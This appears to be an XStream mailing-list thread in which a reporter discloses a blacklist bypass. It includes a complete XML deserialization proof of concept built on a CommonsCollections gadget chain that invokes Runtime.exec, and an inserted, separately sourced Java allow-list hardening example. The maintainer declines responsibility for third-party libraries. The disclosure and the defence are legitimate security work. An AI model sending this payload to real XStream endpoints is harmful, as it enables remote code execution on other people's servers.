I found a new chain and used Java runtime to bypass the blacklist, and want to report this issue to XStream. How can I report this issue's details?


万人往

May 25, 2021, 11:18:39 PM
to XStream User
I found a new chain to bypass the blacklist, and want to report this issue to XStream. How can I report this issue's details?

Jörg Schaible

May 26, 2021, 5:29:07 AM
to xstrea...@googlegroups.com
On Wednesday, 26 May 2021, 05:18:39 CEST, 万人往 wrote:
> I found a new chain to bypass the blacklist, and want to report this
> issue to XStream. How can I report this issue's details?

You have been invited to XStream's Security list, please report there.

Regards.
Jörg


万人往

May 30, 2021, 10:15:52 PM
to XStream User
Description: Directly trigger the deserialization payload of the Java native library through XStream, including but not limited to the jdk 7u21, 8u20 and CommonsCollections series
Version: 1.4.17
Conditions of use: When XStream and commons-collections=3.1 exist at the same time, it can cause RCE
POC:
<set>
  <org.apache.commons.collections.keyvalue.TiedMapEntry>
    <map class="org.apache.commons.collections.map.LazyMap" serialization="custom">
      <unserializable-parents/>
      <org.apache.commons.collections.map.LazyMap>
        <default>
          <factory class="org.apache.commons.collections.functors.ChainedTransformer">
            <iTransformers>
              <org.apache.commons.collections.functors.ConstantTransformer>
                <iConstant class="java-class">java.lang.Runtime</iConstant>
              </org.apache.commons.collections.functors.ConstantTransformer>
              <org.apache.commons.collections.functors.InvokerTransformer>
                <iMethodName>getMethod</iMethodName>
                <iParamTypes>
                  <java-class>java.lang.String</java-class>
                  <java-class>[Ljava.lang.Class;</java-class>
                </iParamTypes>
                <iArgs>
                  <string>getRuntime</string>
                  <java-class-array/>
                </iArgs>
              </org.apache.commons.collections.functors.InvokerTransformer>
              <org.apache.commons.collections.functors.InvokerTransformer>
                <iMethodName>invoke</iMethodName>
                <iParamTypes>
                  <java-class>java.lang.Object</java-class>
                  <java-class>[Ljava.lang.Object;</java-class>
                </iParamTypes>
                <iArgs>
                  <null/>
                  <object-array/>
                </iArgs>
              </org.apache.commons.collections.functors.InvokerTransformer>
              <org.apache.commons.collections.functors.InvokerTransformer>
                <iMethodName>exec</iMethodName>
                <iParamTypes>
                  <java-class>java.lang.String</java-class>
                </iParamTypes>
                <iArgs class="string-array">
                  <string>open /System/Applications/Calculator.app</string>
                </iArgs>
              </org.apache.commons.collections.functors.InvokerTransformer>
              <org.apache.commons.collections.functors.ConstantTransformer>
                <iConstant class="int">1</iConstant>
              </org.apache.commons.collections.functors.ConstantTransformer>
            </iTransformers>
          </factory>
        </default>
        <map/>
      </org.apache.commons.collections.map.LazyMap>
    </map>
    <key class="string">foo</key>
  </org.apache.commons.collections.keyvalue.TiedMapEntry>
</set>


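Added example, not code from the thread's author or from the XStream project: the allow-list configuration that XStream's security framework (XStream 1.4.17 API) supports, which rejects the posted payload at the first non-allowed class instead of relying on the blacklist the report bypasses. The package `com.example.model` is a placeholder for the application's own types, and the payload string is a constructed, truncated stand-in for the POC above.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class XStreamAllowlistDemo {

    // Constructed stand-in for the POC: only the outer <set> and the first gadget
    // class are needed to show where the allow list stops the unmarshalling.
    static final String PAYLOAD =
        "<set>" +
        "  <org.apache.commons.collections.keyvalue.TiedMapEntry>" +
        "    <key class=\"string\">foo</key>" +
        "  </org.apache.commons.collections.keyvalue.TiedMapEntry>" +
        "</set>";

    // Deny-by-default configuration: clear the implicit AnyTypePermission of
    // 1.4.17 and re-add only what the application actually deserializes.
    static XStream hardened() {
        XStream xs = new XStream();
        xs.addPermission(NoTypePermission.NONE);            // deny everything first
        xs.addPermission(NullPermission.NULL);              // <null/>
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES); // int, boolean, ...
        xs.allowTypeHierarchy(java.util.Collection.class);  // lets the outer <set> parse
        xs.allowTypes(new Class[] { String.class });
        // Placeholder for the application's own model package (assumption).
        xs.allowTypesByWildcard(new String[] { "com.example.model.**" });
        return xs;
    }

    // Returns true when XStream refuses the document because a class in it
    // is not on the allow list; the gadget class is never resolved or loaded.
    static boolean rejects(XStream xs, String xml) {
        try {
            xs.fromXML(xml);
            return false;
        } catch (ForbiddenClassException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        // Expected: true, raised for TiedMapEntry before any LazyMap/Transformer is seen.
        System.out.println("allow list rejects payload: " + rejects(hardened(), PAYLOAD));
    }
}
```

With the allow list in place the outcome no longer depends on which third-party library is on the classpath, which is the gap the blacklist bypass in this thread exploits.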
Lai Han of nsfocus security team

May 30, 2021, 10:16:59 PM
to XStream User

The maintainers don't seem to accept this kind of vulnerability that requires third-party libraries.

Jörg Schaible

Jun 7, 2021, 5:38:01 PM
to XStream User
Hi,

On Monday, 31. May 2021, 04:15:52 CEST 万人往 wrote:
> Description: Directly trigger the deserialization payload of the Java native
> library through XStream, including but not limited to the jdk 7u21, 8u20 and
> CommonsCollections series

3rd party libraries are beyond XStream's responsibility.

Regards,
Jörg

